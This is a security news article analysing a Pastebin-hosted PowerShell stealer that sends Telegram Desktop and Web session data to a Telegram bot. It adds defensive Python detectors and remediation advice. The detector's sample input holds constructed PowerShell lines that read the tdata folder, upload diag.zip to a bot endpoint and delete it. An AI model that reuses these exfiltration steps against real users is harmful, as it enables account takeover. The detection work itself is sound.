Cybersecurity researchers have uncovered a PowerShell script hosted on Pastebin that is built to steal Telegram session data from both desktop and web-based clients. The discovery illustrates a growing pattern in which attackers use seemingly innocuous platforms to distribute malware disguised as routine system updates. The script is deceptively named “Windows Telemetry Update” so that users will run it themselves, handing over their sensitive communication data in the process.
The script’s functionality goes beyond simple data theft. According to analysis by Flare, threat actors are actively developing and refining these tools, with evidence suggesting a functional web-based session capture tool that shares infrastructure with the desktop stealer. This indicates a progression from experimentation to potentially scalable operations, posing a significant risk to individuals and organizations relying on Telegram for communication.
How the Script Steals Your Telegram Session
The infection chain starts when a victim manually executes the disguised PowerShell file. Once running, the “Windows Telemetry Update” script first gathers basic host metadata: the user’s username, the computer name, and the public IP address, which it obtains by querying api.ipify[.]org.
After collecting the metadata, the script moves to its primary objective: the Telegram session files. It searches for the directories used by Telegram Desktop and its beta version, typically located under %APPDATA%, then archives the session files into a compressed file named “diag.zip” that is stored temporarily in the user’s TEMP folder.
Flare analysts note that the script takes a dual approach: it targets desktop session data and uses the Telegram Bot API for exfiltration. It also shares infrastructure with a separate tool designed to capture web-based Telegram sessions, so the threat covers users of both Telegram interfaces.
The discovery of two versions of the script on Pastebin offers a rare glimpse into the development lifecycle of such tools. The initial version (v1) had a broken upload implementation and failed to send the “diag.zip” archive to the operator. The operator noticed the failure, fixed the flaw and released a corrected version (v2). The corrected variant calls the sendDocument endpoint using the Invoke-RestMethod -Form approach with proper multipart/form-data encoding, showing a clear debugging and refinement process.
It is noteworthy that neither version of the script employs obfuscation techniques or includes persistence mechanisms. Additionally, there is no automated delivery or execution method evident. Based on the analysis, the script appeared to still be in a validation phase at the time of its discovery, rather than being deployed in a widespread campaign. However, the existence of a functional v2 variant and the shared bot infrastructure with the web-based stealer suggest that this capability has passed initial testing and could be scaled for broader deployment.
Exfiltration proceeds as follows. After collecting and compressing the session files, the script attempts to send the “diag.zip” archive to the attacker through the Telegram Bot API, specifically the api.telegram.org/bot{token}/sendDocument endpoint, with the victim metadata included as the caption. If that primary method fails, a WebClient.UploadFile fallback still sends the archive, though without the caption.
To cover its tracks, the script deletes the “diag.zip” file from the victim’s disk as soon as the upload completes, removing forensic evidence that could link the activity back to the attacker. The separate web-based stealer component, meanwhile, captures active Telegram Web localStorage session state, in particular MTProto authorization keys and account session structures. With these keys an attacker can reconstruct authenticated sessions without the account’s password or SMS verification, which severely undermines account security.
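As an added illustration, written for this article and not taken from Flare's tooling or from the script under analysis, the following Python triage helper scores PowerShell script text (for example the body of a Script Block Logging event, Event ID 4104) against the behaviours described above: the public IP lookup, the Telegram Desktop session directory, the diag.zip archive, the Bot API sendDocument call, the WebClient.UploadFile fallback and the cleanup. The indicator category names, the verdict thresholds and the sample script fragments are assumptions constructed for the example; the bot token in the sample is a placeholder.

```python
"""Added triage example (not Flare's tooling or the script analysed above):
score PowerShell script text, e.g. the body of a Script Block Logging event,
against the behavioural indicators described in the article."""
import re
from dataclasses import dataclass, field

# One pattern per behaviour the article describes; category names are ours.
INDICATORS = {
    "host_metadata_lookup": re.compile(r"api\.ipify\.org", re.I),
    "telegram_session_path": re.compile(r"Telegram\s+Desktop.{0,40}\\tdata", re.I),
    "diag_archive": re.compile(r"diag\.zip", re.I),
    "bot_api_sendDocument": re.compile(r"api\.telegram\.org/bot[^/\s\"']+/sendDocument", re.I),
    "webclient_upload_fallback": re.compile(r"WebClient\b.*UploadFile", re.I),
    "archive_cleanup": re.compile(r"Remove-Item[^\n]*diag\.zip", re.I),
}
# Bot API URLs embed the token as /bot<bot_id>:<secret>/.
BOT_TOKEN = re.compile(r"/bot(\d+:[A-Za-z0-9_-]+)")


def redact_token(token: str) -> str:
    """Keep the numeric bot ID (useful for blocking and for tying samples
    together) and drop the secret part after the colon."""
    return token.split(":", 1)[0] + ":<redacted>"


@dataclass
class TriageResult:
    matched: list = field(default_factory=list)
    bot_tokens: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.matched)

    @property
    def verdict(self) -> str:
        # Reading the session directory plus any upload path is the stealer
        # pattern; a lone IP lookup or a temp archive on its own is not.
        exfil = {"bot_api_sendDocument", "webclient_upload_fallback"} & set(self.matched)
        if "telegram_session_path" in self.matched and exfil:
            return "high"
        if self.score >= 2:
            return "medium"
        return "low"


def triage(script_text: str) -> TriageResult:
    """Match every indicator against the script text and redact any bot token found."""
    result = TriageResult()
    for name, pattern in INDICATORS.items():
        if pattern.search(script_text):
            result.matched.append(name)
    result.bot_tokens = [redact_token(t) for t in BOT_TOKEN.findall(script_text)]
    return result


# Constructed fragments carrying the indicators (placeholder token, not the
# real script); in practice script_text would come from the event log.
SAMPLE_STEALER_FRAGMENTS = r"""
$ip = Invoke-RestMethod -Uri "https://api.ipify.org"
$src = Join-Path $env:APPDATA "Telegram Desktop\tdata"
$uri = "https://api.telegram.org/bot000000000:CONSTRUCTED_PLACEHOLDER_TOKEN/sendDocument"
Invoke-RestMethod -Uri $uri -Method Post -Form $form
$wc = New-Object System.Net.WebClient; $wc.UploadFile($uri, "$env:TEMP\diag.zip")
Remove-Item "$env:TEMP\diag.zip" -Force
"""
# Constructed benign inventory script that also looks up the public IP.
SAMPLE_BENIGN_INVENTORY = r"""
$ip = Invoke-RestMethod -Uri "https://api.ipify.org"
Get-ComputerInfo | Export-Csv "$env:TEMP\inventory.csv"
"""

if __name__ == "__main__":
    for label, text in (("stealer fragments", SAMPLE_STEALER_FRAGMENTS),
                        ("inventory script", SAMPLE_BENIGN_INVENTORY)):
        r = triage(text)
        print(f"{label}: verdict={r.verdict} score={r.score} matched={r.matched} bots={r.bot_tokens}")
```

The verdict deliberately hinges on the combination of session-directory access and an upload path rather than on any single string, so a legitimate inventory script that happens to query api.ipify.org scores low. Bot IDs are kept in the result while the secret is redacted, which lets an analyst share findings and block the bot without circulating a working token.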
Security professionals and Telegram users should take immediate action if they suspect this script may have been executed on their systems. It is crucial to terminate all active Telegram sessions by navigating to Settings > Privacy and Security > Active Sessions and selecting “Terminate All Other Sessions.” Following this, users should change their Telegram password and enable two-factor authentication if it is not already active.
Furthermore, a thorough review of the Telegram account for any unauthorized activity, unexpected sent messages, or altered settings is recommended. Users should also consider the possibility that any sensitive information previously shared via Telegram may have been exposed and take appropriate steps to secure related accounts or notify affected parties. From a network security perspective, blocking the domains api.telegram.org and web.telegram.org at the proxy and firewall layer can offer protection, especially in environments where Telegram usage is restricted.
For organizations where Telegram is permitted, heightened network monitoring is advised. Security teams should watch for sendDocument and sendMessage API calls originating from scripting environments such as PowerShell, Python, or curl; such calls are uncommon in legitimate enterprise operations and warrant immediate investigation. The continued development of tools like this one underscores the need for defenses that keep pace with the threat landscape, both around popular communication platforms like Telegram and around the abuse of readily available services like Pastebin for malware distribution.
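The monitoring advice above can be turned into a concrete hunt. The following Python example, added here and not part of the original article or Flare's tooling, scans proxy log records for Telegram Bot API sendDocument and sendMessage calls issued from scripting user agents, keeps the bot ID while discarding the token secret, and pivots on the bot ID to show when several hosts talk to the same bot (the shared infrastructure the article describes). The JSON log field names, the user-agent fragments and the sample records are constructed assumptions.

```python
"""Added detection example (not Flare's tooling or the script analysed above):
hunt proxy logs for Telegram Bot API sendDocument/sendMessage calls issued
from scripting user agents, and pivot on the bot ID they share."""
import json
import re
from collections import defaultdict

# Bot API path: /bot<bot_id>:<secret>/<method>. Only sendDocument and
# sendMessage are of interest here; the secret is matched but never stored.
BOT_API_CALL = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>sendDocument|sendMessage)\b"
)
# User-agent fragments for the scripting clients named in the article
# (assumed formats: PowerShell's web cmdlets identify themselves with a
# "...WindowsPowerShell/5.x" or "...PowerShell/7.x" agent).
SCRIPTING_UA = re.compile(
    r"WindowsPowerShell/|PowerShell/|python-requests|python-urllib|\bcurl/|\bWget/", re.I
)

# Constructed proxy log, one JSON record per line (field names are assumptions).
SAMPLE_PROXY_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": "2024-01-01T10:00:01Z", "src": "10.0.0.5", "method": "POST", "host": "api.telegram.org",
     "path": "/bot111111111:CONSTRUCTED_A/sendDocument",
     "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"},
    {"ts": "2024-01-01T10:00:02Z", "src": "10.0.0.7", "method": "GET", "host": "web.telegram.org",
     "path": "/k/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"},
    {"ts": "2024-01-01T10:00:03Z", "src": "10.0.0.9", "method": "POST", "host": "api.telegram.org",
     "path": "/bot222222222:CONSTRUCTED_B/sendMessage", "user_agent": "python-requests/2.31.0"},
    {"ts": "2024-01-01T10:00:04Z", "src": "10.0.0.7", "method": "GET", "host": "api.telegram.org",
     "path": "/bot333333333:CONSTRUCTED_C/getUpdates",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"},
    {"ts": "2024-01-01T10:00:05Z", "src": "10.0.0.9", "method": "POST", "host": "api.telegram.org",
     "path": "/bot111111111:CONSTRUCTED_A/sendDocument", "user_agent": "curl/8.4.0"},
])


def hunt_bot_api_exfil(log_text, approved_bot_ids=frozenset()):
    """Return one alert per Bot API upload/message call from a scripting client.
    approved_bot_ids: bot IDs the organisation itself registered (assumption:
    such an allowlist exists); any other bot is treated as unknown."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("host", "").lower() != "api.telegram.org":
            continue
        m = BOT_API_CALL.match(rec.get("path", ""))
        if not m or m["bot_id"] in approved_bot_ids:
            continue
        ua = rec.get("user_agent", "")
        if not SCRIPTING_UA.search(ua):
            continue
        # Keep the bot ID (needed to pivot and to block) but drop the secret,
        # so alerts can be shared without leaking a working token.
        alerts.append({"ts": rec["ts"], "src": rec["src"], "bot_id": m["bot_id"],
                       "method": m["method"], "user_agent": ua})
    return alerts


def pivot_by_bot(alerts):
    """Map each bot ID to the sorted list of source hosts that talked to it;
    one bot reached from several hosts points at shared operator
    infrastructure rather than an isolated test."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a["bot_id"]].add(a["src"])
    return {bot: sorted(hosts) for bot, hosts in seen.items()}


if __name__ == "__main__":
    found = hunt_bot_api_exfil(SAMPLE_PROXY_LOG)
    for a in found:
        print(f"{a['ts']} {a['src']} bot={a['bot_id']} {a['method']} ua={a['user_agent']!r}")
    print(pivot_by_bot(found))
```

On the constructed log the hunt raises three alerts and the pivot shows bot 111111111 contacted from two hosts. The browser request to web.telegram.org and the polling call to getUpdates are ignored; widening the method list is a one-line change if an environment wants every Bot API call from a scripting client surfaced.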